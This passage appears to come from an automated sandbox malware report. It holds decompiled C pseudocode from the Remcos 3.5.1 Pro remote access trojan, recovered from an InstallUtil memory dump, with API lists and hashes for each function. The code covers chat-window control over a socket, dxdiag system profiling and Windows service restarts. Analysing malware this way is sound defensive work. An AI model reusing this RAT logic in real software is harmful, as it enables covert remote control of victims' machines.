                                                                      0x0041ceaf 0x0041ceb5 0x0041ceb8 0x0041ceba 0x0041cec3 0x0041ceff 0x0041ceff 0x0041cec5
                                                                      0x0041cec5 0x0041ceca 0x0041cecc 0x0041ced4 0x0041ced9 0x0041cede 0x00000000 0x00000000
                                                                      0x0041cee9 0x0041ceee 0x0041cef3 0x00000000 0x00000000 0x0041cef5 0x0041cef6 0x0041cefd
                                                                      0x00000000 0x00000000 0x00000000 0x0041cefd 0x0041cf3e 0x0041cf48 0x00000000 0x00000000
                                                                      0x0041cf4e 0x0041cf52 0x0041cf5b 0x0041cf65 0x0041cf6c 0x0041cf72 0x0041cf78 0x0041cfb9
                                                                      0x0041cfb9 0x0041cfc1 0x0041cfc3 0x00000000 0x0041cfc3 0x0041cf7c 0x0041cf8c 0x0041cf91
                                                                      0x0041cfa8 0x0041cfad 0x0041cfaf 0x0041cfaf 0x00000000 0x0041cfad 0x0041cf9d 0x0041cfa3
                                                                      0x0041cfa6 0x00000000 0x00000000 0x00000000 0x0041cfa6 0x0041cf7e 0x0041cf86 0x00000000
                                                                      0x00000000 0x00000000 0x00000000 0x0041cf86 0x0041cf03 0x0041cf05 0x0041cf06 0x0041cf10
                                                                      0x0041cf1a 0x0041cf1e 0x0041cf28 0x0041cf2f 0x0041cf34 0x00000000

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _strlen_strstr$_strncpy
                                                                      • String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
                                                                      • API String ID: 3390399981-1012175531
                                                                      • Opcode ID: 6bb8123dc9140045cddffba2b3aafdd2df29b84b76c6b952785370a766b1167b
                                                                      • Instruction ID: 859e8405bce250f7c3cf1f5e5d7944e35ec7c8a1934b8ee426a9c6d520d10168
                                                                      • Opcode Fuzzy Hash: 6bb8123dc9140045cddffba2b3aafdd2df29b84b76c6b952785370a766b1167b
                                                                      • Instruction Fuzzy Hash: 985169726883015ED3209E249C85BABB7D69B98318F14492FF88487281E37DC997C79F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E00405477(char* __edx, void* __eflags, intOrPtr _a4) {
                                                                      				struct tagMSG _v52;
                                                                      				void* _v56;
                                                                      				char _v60;
                                                                      				char _v76;
                                                                      				char _v80;
                                                                      				char _v84;
                                                                      				char _v104;
                                                                      				char _v108;
                                                                      				void* _v112;
                                                                      				char _v116;
                                                                      				char _v120;
                                                                      				char _v140;
                                                                      				void* _v176;
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t28;
                                                                      				char* _t36;
                                                                      				intOrPtr _t45;
                                                                      				intOrPtr _t46;
                                                                      				void* _t57;
                                                                      				intOrPtr _t69;
                                                                      				void* _t111;
                                                                      				void* _t113;
                                                                      				void* _t115;
                                                                      				void* _t117;
                                                                      				signed int _t118;
                                                                      				void* _t121;
                                                                      				void* _t122;
                                                                      				void* _t123;
                                                                      				void* _t124;
                                                                      
                                                                      				_t126 = __eflags;
                                                                      				_t101 = __edx;
                                                                      				_t69 = _a4;
                                                                      				E004020B6(_t69,  &_v104, __edx, __eflags, _t69 + 0xc);
                                                                      				SetEvent( *(_t69 + 0x24));
                                                                      				_t28 = E00401F6B( &_v108);
                                                                      				E00404162( &_v108,  &_v60, 4, 0xffffffff);
                                                                      				_t121 = (_t118 & 0xfffffff8) - 0x5c;
                                                                      				E004020B6(_t69, _t121, _t101, _t126, 0x46e260);
                                                                      				_t122 = _t121 - 0x18;
                                                                      				E004020B6(_t69, _t122, _t101, _t126,  &_v76);
                                                                      				E0041851D( &_v140, _t101);
                                                                      				_t123 = _t122 + 0x30;
                                                                      				_t111 =  *_t28 - 0x3a;
                                                                      				if(_t111 == 0) {
                                                                      					E00401E25( &_v116, _t101, _t117, __eflags, 0);
                                                                      					_t36 = E0040243C();
                                                                      					E00401F6B(E00401E25( &_v120, _t101, _t117, __eflags, 0));
                                                                      					_t101 = _t36;
                                                                      					_t113 = E0040F872();
                                                                      					__eflags = _t113;
                                                                      					if(_t113 == 0) {
                                                                      						L7:
                                                                      						E00401E4D( &_v116, _t101);
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      						__eflags = 0;
                                                                      						return 0;
                                                                      					}
                                                                      					 *0x46dae0 = E0040FAE7(_t113, "DisplayMessage");
                                                                      					_t45 = E0040FAE7(_t113, "GetMessage");
                                                                      					_t104 = "CloseChat";
                                                                      					 *0x46dad8 = _t45;
                                                                      					_t46 = E0040FAE7(_t113, "CloseChat");
                                                                      					_t124 = _t123 - 0x18;
                                                                      					 *0x46dadc = _t46;
                                                                      					 *0x46dad5 = 1;
                                                                      					E004020B6(_t69, _t124, "CloseChat", __eflags, 0x46e2f8);
                                                                      					_push(0x74);
                                                                      					E00404A78(_t69, _t104, __eflags);
                                                                      					L10:
                                                                      					_t115 = HeapCreate(0, 0, 0);
                                                                      					__eflags =  *0x46dad8(_t115,  &_v140);
                                                                      					if(__eflags != 0) {
                                                                      						_t124 = _t124 - 0x18;
                                                                      						E00402077(_t69, _t124, _t104, _t117, __eflags, _v140, _t51);
                                                                      						_push(0x3b);
                                                                      						E00404A78(_t69, _t104, __eflags);
                                                                      						HeapFree(_t115, 0, _v176);
                                                                      					}
                                                                      					goto L10;
                                                                      				}
                                                                      				_t128 = _t111 != 1;
                                                                      				if(_t111 != 1) {
                                                                      					goto L7;
                                                                      				}
                                                                      				_t57 =  *0x46dae0(E00401F6B(E00401E25( &_v116, _t101, _t117, _t128, 0)));
                                                                      				_t129 = _t57;
                                                                      				if(_t57 == 0) {
                                                                      					goto L7;
                                                                      				}
                                                                      				E0040413E(_t69,  &_v80, _t101, _t117, 0x461080);
                                                                      				_t101 =  &_v84;
                                                                      				E00418445(_t69, _t123 - 0x18,  &_v84);
                                                                      				_push(0x3b);
                                                                      				E00404A78(_t69,  &_v84, _t129);
                                                                      				E00401EC9();
                                                                      				L4:
                                                                      				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
                                                                      					TranslateMessage( &_v52);
                                                                      					DispatchMessageA( &_v52);
                                                                      				}
                                                                      				if(__eflags < 0) {
                                                                      					goto L4;
                                                                      				}
                                                                      				goto L7;
                                                                      			}
                                                                      APIs
                                                                      • SetEvent.KERNEL32(?,?), ref: 00405496
                                                                      • GetMessageA.USER32 ref: 00405546
                                                                      • TranslateMessage.USER32(?), ref: 00405555
                                                                      • DispatchMessageA.USER32 ref: 00405560
                                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046E2F8), ref: 00405618
                                                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405650
                                                                        • Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                                                      • API String ID: 2956720200-749203953
                                                                      • Opcode ID: f6524e1648d4de4095ce36fbc337c73dc48f34eac38669dfa5b6b18361cf6ba2
                                                                      • Instruction ID: 50b24cc1a81940f1b5dd5029fae4e8300528e881efd1fe54cb18f3561050ea4e
                                                                      • Opcode Fuzzy Hash: f6524e1648d4de4095ce36fbc337c73dc48f34eac38669dfa5b6b18361cf6ba2
                                                                      • Instruction Fuzzy Hash: 0C41C431A083415BCB14FB76DC5A86F77A9ABC5708F40093EF912A71E1EF388905CB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E00414430(void* __ecx, void* __edx, void* __edi, void* __eflags, char _a4) {
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				char _v76;
                                                                      				char _v204;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t46;
                                                                      				void* _t54;
                                                                      				void* _t55;
                                                                      				void* _t90;
                                                                      				void* _t92;
                                                                      				void* _t93;
                                                                      
                                                                      				_t95 = __eflags;
                                                                      				_t90 = __edi;
                                                                      				E00402FD4(_t54,  &_v76, E0040413E(_t54,  &_v52, __edx, _t92, E00438A0F(_t54, __ecx, __eflags, L"temp")), _t90, _t92, _t95, L"\\sysinfo.txt");
                                                                      				E00401EC9();
                                                                      				_t55 = 0;
                                                                      				ShellExecuteW(0, L"open", L"dxdiag", E00401EC4(E0040A01F( &_v52, L"/t ", _t92,  &_v76)), 0, 0);
                                                                      				E00401EC9();
                                                                      				E0040209F(0,  &_v28);
                                                                      				_t91 = 0;
                                                                      				do {
                                                                      					E00401EC4( &_v76);
                                                                      					_t88 =  &_v28;
                                                                      					E004189A5( &_v28);
                                                                      					Sleep(0x64);
                                                                      					_t91 = _t91 + 1;
                                                                      				} while (E00409F76() != 0 && _t91 < 0x4b0);
                                                                      				if(E00409F76() == 0) {
                                                                      					DeleteFileW(E00401EC4( &_v76));
                                                                      					E004046B7( &_v204, _t92, 1);
                                                                      					_t46 = E0040489F( &_v204, _t91,  &_v204);
                                                                      					_t100 = _t46;
                                                                      					if(_t46 != 0) {
                                                                      						_t91 = _t93 - 0x18;
                                                                      						_t16 =  &_a4; // 0x413fe7
                                                                      						_t88 = E00402EF1( &_v52, _t16, _t92, 0x46e260);
                                                                      						E00402ED0(_t55, _t93 - 0x18, _t49, _t92, _t100,  &_v28);
                                                                      						_push(0x97);
                                                                      						E00404A78( &_v204, _t49, _t100);
                                                                      						E00401F98();
                                                                      						E00404DFD(_t49);
                                                                      						_t55 = 1;
                                                                      					}
                                                                      					E00404EB9(_t55,  &_v204, _t88, _t91);
                                                                      				}
                                                                      				E00401F98();
                                                                      				E00401EC9();
                                                                      				E00401F98();
                                                                      				return _t55;
                                                                      			}
                                                                      APIs
                                                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00414490
                                                                        • Part of subcall function 004189A5: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00408F6D), ref: 004189BE
                                                                      • Sleep.KERNEL32(00000064), ref: 004144BC
                                                                      • DeleteFileW.KERNEL32(00000000), ref: 004144F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CreateDeleteExecuteShellSleep
                                                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp$?A
                                                                      • API String ID: 1462127192-522105993
                                                                      • Opcode ID: 07e4f663946d65be398ffbd40286491c131c561b2fed13d89b1c0f123ac5eda8
                                                                      • Instruction ID: 9492f98b08e5c5c357063eda817348553446c523427aff16ffafa97b72869cf5
                                                                      • Opcode Fuzzy Hash: 07e4f663946d65be398ffbd40286491c131c561b2fed13d89b1c0f123ac5eda8
                                                                      • Instruction Fuzzy Hash: 703180719102185ACB08FBA1DC96DEE7764AF50308F00007FF906771E2EF381D8ACA99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00419F77(void* __ebx, void* __ecx, void* __edx, void* __edi) {
                                                                      				struct HWND__* _t11;
                                                                      				void* _t30;
                                                                      				void* _t35;
                                                                      				void* _t36;
                                                                      				void* _t37;
                                                                      
                                                                      				_t35 = __edi;
                                                                      				_t32 = __ecx;
                                                                      				_t36 = _t37 - 0x78;
                                                                      				_t30 = __ecx;
                                                                      				AllocConsole();
                                                                      				_t11 =  *0x46ecb0(__ebx);
                                                                      				_t41 = _t30;
                                                                      				 *0x46deb4 = _t11;
                                                                      				if(_t30 == 0) {
                                                                      					ShowWindow(_t11, 0);
                                                                      				}
                                                                      				E0043DFD9(_t32, "CONOUT$", "a", E0043956E(1));
                                                                      				E004337A0(_t35, _t36 - 0x50, 0, 0xc8);
                                                                      				E0043E020(_t36 - 0x50, "--------------------------\n");
                                                                      				E0043E020(_t36 - 0x50, " * Remcos v");
                                                                      				E0043E020(_t36 - 0x50, "3.5.1 Pro");
                                                                      				E0043E020(_t36 - 0x50, "\n * BreakingSecurity.net\n");
                                                                      				E0043E020(_t36 - 0x50, "--------------------------\n\n");
                                                                      				_push(_t36 - 0x50);
                                                                      				return E00417B70(_t41);
                                                                      			}

                                                                      APIs
                                                                      • AllocConsole.KERNEL32(00000001), ref: 00419F85
                                                                      • GetConsoleWindow.KERNEL32 ref: 00419F8B
                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00419F9E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ConsoleWindow$AllocShow
                                                                      • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.5.1 Pro$CONOUT$
                                                                      • API String ID: 3461962499-3463560965
                                                                      • Opcode ID: 3dc36d18dec3417e34489f19bbd5f9285a6577b791add2ccac7cbf19b1364e0d
                                                                      • Instruction ID: dd5034e40d5e62cdb4a5cc15f6e42495c228d7269276c1949c1d7be5665b3ad0
                                                                      • Opcode Fuzzy Hash: 3dc36d18dec3417e34489f19bbd5f9285a6577b791add2ccac7cbf19b1364e0d
                                                                      • Instruction Fuzzy Hash: 890125B19853186ADB10BBF1DD46FDE77BC6B0870AF54141BF110A70D2EAECA148462E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E0041738B(char _a4) {
                                                                      				intOrPtr _v28;
                                                                      				struct _SERVICE_STATUS _v32;
                                                                      				int _t22;
                                                                      				void* _t26;
                                                                      				void* _t27;
                                                                      
                                                                      				_t22 = 0;
                                                                      				_t27 = OpenSCManagerW(0, 0, 0x11);
                                                                      				_t26 = OpenServiceW(_t27, E00401EC4( &_a4), 0xf003f);
                                                                      				if(_t26 != 0) {
                                                                      					if(ControlService(_t26, 1,  &_v32) != 0) {
                                                                      						do {
                                                                      							QueryServiceStatus(_t26,  &_v32);
                                                                      						} while (_v28 != 1);
                                                                      						StartServiceW(_t26, 0, 0);
                                                                      						asm("sbb ebx, ebx");
                                                                      						_t22 = 3;
                                                                      						CloseServiceHandle(_t27);
                                                                      						CloseServiceHandle(_t26);
                                                                      					} else {
                                                                      						CloseServiceHandle(_t27);
                                                                      						CloseServiceHandle(_t26);
                                                                      						_t22 = 2;
                                                                      					}
                                                                      				} else {
                                                                      					CloseServiceHandle(_t27);
                                                                      				}
                                                                      				E00401EC9();
                                                                      				return _t22;
                                                                      			}

                                                                      APIs
                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00416D04,00000000), ref: 0041739A
                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00416D04,00000000), ref: 004173B1
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416D04,00000000), ref: 004173BE
                                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00416D04,00000000), ref: 004173CD
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416D04,00000000), ref: 004173DE
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416D04,00000000), ref: 004173E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                                      • String ID:
                                                                      • API String ID: 221034970-0
                                                                      • Opcode ID: 8075aaf96f24b09abf3fe96909d2938f6295a241c5dc891494a6c2ca102c6517
                                                                      • Instruction ID: b565da2570de756faa497913c3aa2cbeda0fd235e416a951b4a5e1d22870c777
                                                                      • Opcode Fuzzy Hash: 8075aaf96f24b09abf3fe96909d2938f6295a241c5dc891494a6c2ca102c6517
                                                                      • Instruction Fuzzy Hash: 6211063194431CABC711AB64DC84CFF3B7CDB85BAAB100036FE05961C1DB28CC86A6B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00444161(char _a4) {
                                                                      				char _v8;
                                                                      
                                                                      				_t26 = _a4;
                                                                      				_t52 =  *_a4;
                                                                      				if( *_a4 != 0x4582c0) {
                                                                      					E004427C2(_t52);
                                                                      					_t26 = _a4;
                                                                      				}
                                                                      				E004427C2( *((intOrPtr*)(_t26 + 0x3c)));
                                                                      				E004427C2( *((intOrPtr*)(_a4 + 0x30)));
                                                                      				E004427C2( *((intOrPtr*)(_a4 + 0x34)));
                                                                      				E004427C2( *((intOrPtr*)(_a4 + 0x38)));
                                                                      				E004427C2( *((intOrPtr*)(_a4 + 0x28)));
                                                                      				E004427C2( *((intOrPtr*)(_a4 + 0x2c)));
                                                                      				E004427C2( *((intOrPtr*)(_a4 + 0x40)));
                                                                      				E004427C2( *((intOrPtr*)(_a4 + 0x44)));
                                                                      				E004427C2( *((intOrPtr*)(_a4 + 0x360)));
                                                                      				_v8 =  &_a4;
                                                                      				E00444027(5,  &_v8);
                                                                      				_v8 =  &_a4;
                                                                      				return E00444077(4,  &_v8);
                                                                      			}

                                                                      APIs
                                                                      • _free.LIBCMT ref: 00444175
                                                                        • Part of subcall function 004427C2: HeapFree.KERNEL32(00000000,00000000,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A), ref: 004427D8
                                                                        • Part of subcall function 004427C2: GetLastError.KERNEL32(0000000A,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A,0000000A), ref: 004427EA
                                                                      • _free.LIBCMT ref: 00444181
                                                                      • _free.LIBCMT ref: 0044418C
                                                                      • _free.LIBCMT ref: 00444197
                                                                      • _free.LIBCMT ref: 004441A2
                                                                      • _free.LIBCMT ref: 004441AD
                                                                      • _free.LIBCMT ref: 004441B8
                                                                      • _free.LIBCMT ref: 004441C3
                                                                      • _free.LIBCMT ref: 004441CE
                                                                      • _free.LIBCMT ref: 004441DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: d989b8b8f4764be2eabf03f7fa6b03dc5a8668e2bc9c861313d94e6db9b20cf2
                                                                      • Instruction ID: 723cca80dea696d3e278b39cc018992024622c01c3a35b4f32945068e724164b
                                                                      • Opcode Fuzzy Hash: d989b8b8f4764be2eabf03f7fa6b03dc5a8668e2bc9c861313d94e6db9b20cf2
                                                                      • Instruction Fuzzy Hash: 0E11CB79200108BFDB01EF66C942DDD3BA5FF14754B4144AAFA484F222DB75DE50DB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E00441239(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				short _v270;
                                                                      				short _v272;
                                                                      				char _v528;
                                                                      				char _v700;
                                                                      				signed int _v704;
                                                                      				signed int _v708;
                                                                      				short _v710;
                                                                      				signed int* _v712;
                                                                      				signed int _v716;
                                                                      				signed int _v720;
                                                                      				signed int _v724;
                                                                      				signed int* _v728;
                                                                      				signed int _v732;
                                                                      				signed int _v736;
                                                                      				signed int _v740;
                                                                      				signed int _v744;
                                                                      				signed int _t149;
                                                                      				void* _t156;
                                                                      				signed int _t157;
                                                                      				signed int _t158;
                                                                      				intOrPtr _t159;
                                                                      				signed int _t162;
                                                                      				signed int _t166;
                                                                      				signed int _t167;
                                                                      				intOrPtr _t169;
                                                                      				signed int _t172;
                                                                      				signed int _t173;
                                                                      				signed int _t175;
                                                                      				signed int _t195;
                                                                      				signed int _t196;
                                                                      				signed int _t199;
                                                                      				signed int _t204;
                                                                      				signed int _t207;
                                                                      				intOrPtr* _t213;
                                                                      				intOrPtr* _t214;
                                                                      				signed int _t225;
                                                                      				signed int _t228;
                                                                      				intOrPtr* _t229;
                                                                      				signed int _t231;
                                                                      				signed int* _t235;
                                                                      				void* _t243;
                                                                      				signed int _t244;
                                                                      				intOrPtr _t246;
                                                                      				signed int _t251;
                                                                      				signed int _t253;
                                                                      				signed int _t257;
                                                                      				signed int* _t258;
                                                                      				intOrPtr* _t259;
                                                                      				short _t260;
                                                                      				signed int _t262;
                                                                      				signed int _t264;
                                                                      				void* _t266;
                                                                      				void* _t268;
                                                                      
                                                                      				_t262 = _t264;
                                                                      				_t149 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t149 ^ _t262;
                                                                      				_push(__ebx);
                                                                      				_t207 = _a8;
                                                                      				_push(__esi);
                                                                      				_push(__edi);
                                                                      				_t246 = _a4;
                                                                      				_v744 = _t207;
                                                                      				_v728 = E00444255(_t207, __ecx, __edx) + 0x278;
                                                                      				_push( &_v708);
                                                                      				_t156 = E00440983(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
                                                                      				_t266 = _t264 - 0x2e4 + 0x18;
                                                                      				if(_t156 != 0) {
                                                                      					_t11 = _t207 + 2; // 0x6
                                                                      					_t251 = _t11 << 4;
                                                                      					__eflags = _t251;
                                                                      					_t157 =  &_v272;
                                                                      					_v716 = _t251;
                                                                      					_t213 =  *((intOrPtr*)(_t251 + _t246));
                                                                      					while(1) {
                                                                      						_v704 = _v704 & 0x00000000;
                                                                      						__eflags =  *_t157 -  *_t213;
                                                                      						_t253 = _v716;
                                                                      						if( *_t157 !=  *_t213) {
                                                                      							break;
                                                                      						}
                                                                      						__eflags =  *_t157;
                                                                      						if( *_t157 == 0) {
                                                                      							L8:
                                                                      							_t158 = _v704;
                                                                      						} else {
                                                                      							_t260 =  *((intOrPtr*)(_t157 + 2));
                                                                      							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
                                                                      							_v710 = _t260;
                                                                      							_t253 = _v716;
                                                                      							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
                                                                      								break;
                                                                      							} else {
                                                                      								_t157 = _t157 + 4;
                                                                      								_t213 = _t213 + 4;
                                                                      								__eflags = _v710;
                                                                      								if(_v710 != 0) {
                                                                      									continue;
                                                                      								} else {
                                                                      									goto L8;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L10:
                                                                      						__eflags = _t158;
                                                                      						if(_t158 != 0) {
                                                                      							_t214 =  &_v272;
                                                                      							_t243 = _t214 + 2;
                                                                      							do {
                                                                      								_t159 =  *_t214;
                                                                      								_t214 = _t214 + 2;
                                                                      								__eflags = _t159 - _v704;
                                                                      							} while (_t159 != _v704);
                                                                      							_v720 = (_t214 - _t243 >> 1) + 1;
                                                                      							_t162 = E004421F7(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
                                                                      							_v732 = _t162;
                                                                      							__eflags = _t162;
                                                                      							if(_t162 == 0) {
                                                                      								goto L1;
                                                                      							} else {
                                                                      								_v724 =  *((intOrPtr*)(_t253 + _t246));
                                                                      								_t35 = _t207 * 4; // 0xcbd5
                                                                      								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
                                                                      								_t38 = _t246 + 8; // 0x8b56ff8b
                                                                      								_v740 =  *_t38;
                                                                      								_t223 =  &_v272;
                                                                      								_v712 = _t162 + 4;
                                                                      								_t166 = E00443BA1(_t162 + 4, _v720,  &_v272);
                                                                      								_t268 = _t266 + 0xc;
                                                                      								__eflags = _t166;
                                                                      								if(_t166 != 0) {
                                                                      									_t167 = _v704;
                                                                      									_push(_t167);
                                                                      									_push(_t167);
                                                                      									_push(_t167);
                                                                      									_push(_t167);
                                                                      									_push(_t167);
                                                                      									E00438659();
                                                                      									asm("int3");
                                                                      									_t169 =  *0x46d508; // 0x0
                                                                      									return _t169;
                                                                      								} else {
                                                                      									__eflags = _v272 - 0x43;
                                                                      									 *((intOrPtr*)(_t253 + _t246)) = _v712;
                                                                      									if(_v272 != 0x43) {
                                                                      										L19:
                                                                      										_t172 = E00440690(_t207, _t223, _t246,  &_v700);
                                                                      										_t225 = _v704;
                                                                      										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
                                                                      									} else {
                                                                      										__eflags = _v270;
                                                                      										if(_v270 != 0) {
                                                                      											goto L19;
                                                                      										} else {
                                                                      											_t225 = _v704;
                                                                      											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
                                                                      										}
                                                                      									}
                                                                      									__eflags = _t207 - 2;
                                                                      									if(_t207 != 2) {
                                                                      										__eflags = _t207 - 1;
                                                                      										if(_t207 != 1) {
                                                                      											__eflags = _t207 - 5;
                                                                      											if(_t207 == 5) {
                                                                      												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
                                                                      											}
                                                                      										} else {
                                                                      											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
                                                                      										}
                                                                      									} else {
                                                                      										_t258 = _v728;
                                                                      										_t244 = _t225;
                                                                      										_t235 = _t258;
                                                                      										 *(_t246 + 8) = _v708;
                                                                      										_v712 = _t258;
                                                                      										_v720 = _t258[8];
                                                                      										_v708 = _t258[9];
                                                                      										while(1) {
                                                                      											_t64 = _t246 + 8; // 0x8b56ff8b
                                                                      											__eflags =  *_t64 -  *_t235;
                                                                      											if( *_t64 ==  *_t235) {
                                                                      												break;
                                                                      											}
                                                                      											_t259 = _v712;
                                                                      											_t244 = _t244 + 1;
                                                                      											_t204 =  *_t235;
                                                                      											 *_t259 = _v720;
                                                                      											_v708 = _t235[1];
                                                                      											_t235 = _t259 + 8;
                                                                      											 *((intOrPtr*)(_t259 + 4)) = _v708;
                                                                      											_t207 = _v744;
                                                                      											_t258 = _v728;
                                                                      											_v720 = _t204;
                                                                      											_v712 = _t235;
                                                                      											__eflags = _t244 - 5;
                                                                      											if(_t244 < 5) {
                                                                      												continue;
                                                                      											} else {
                                                                      											}
                                                                      											L27:
                                                                      											__eflags = _t244 - 5;
                                                                      											if(__eflags == 0) {
                                                                      												_t88 = _t246 + 8; // 0x8b56ff8b
                                                                      												_t195 = E0044CE9D(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x4584c8, 0x7f,  &_v528,  *_t88, 1);
                                                                      												_t268 = _t268 + 0x1c;
                                                                      												__eflags = _t195;
                                                                      												_t196 = _v704;
                                                                      												if(_t195 == 0) {
                                                                      													_t258[1] = _t196;
                                                                      												} else {
                                                                      													do {
                                                                      														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
                                                                      														_t196 = _t196 + 1;
                                                                      														__eflags = _t196 - 0x7f;
                                                                      													} while (_t196 < 0x7f);
                                                                      													_t199 = E004338FA( &_v528,  *0x46c160, 0xfe);
                                                                      													_t268 = _t268 + 0xc;
                                                                      													__eflags = _t199;
                                                                      													_t258[1] = 0 | _t199 == 0x00000000;
                                                                      												}
                                                                      												_t103 = _t246 + 8; // 0x8b56ff8b
                                                                      												 *_t258 =  *_t103;
                                                                      											}
                                                                      											 *(_t246 + 0x18) = _t258[1];
                                                                      											goto L38;
                                                                      										}
                                                                      										__eflags = _t244;
                                                                      										if(_t244 != 0) {
                                                                      											 *_t258 =  *(_t258 + _t244 * 8);
                                                                      											_t258[1] =  *(_t258 + 4 + _t244 * 8);
                                                                      											 *(_t258 + _t244 * 8) = _v720;
                                                                      											 *(_t258 + 4 + _t244 * 8) = _v708;
                                                                      										}
                                                                      										goto L27;
                                                                      									}
                                                                      									L38:
                                                                      									_t173 = _t207 * 0xc;
                                                                      									_t110 = _t173 + 0x458408; // 0x40df7b
                                                                      									 *0x4544b0(_t246);
                                                                      									_t175 =  *((intOrPtr*)( *_t110))();
                                                                      									_t228 = _v724;
                                                                      									__eflags = _t175;
                                                                      									if(_t175 == 0) {
                                                                      										__eflags = _t228 - 0x46c298;
                                                                      										if(_t228 != 0x46c298) {
                                                                      											_t257 = _t207 + _t207;
                                                                      											__eflags = _t257;
                                                                      											asm("lock xadd [eax], ecx");
                                                                      											if(_t257 != 0) {
                                                                      												goto L43;
                                                                      											} else {
                                                                      												_t128 = _t257 * 8; // 0x30ff068b
                                                                      												E004427C2( *((intOrPtr*)(_t246 + _t128 + 0x28)));
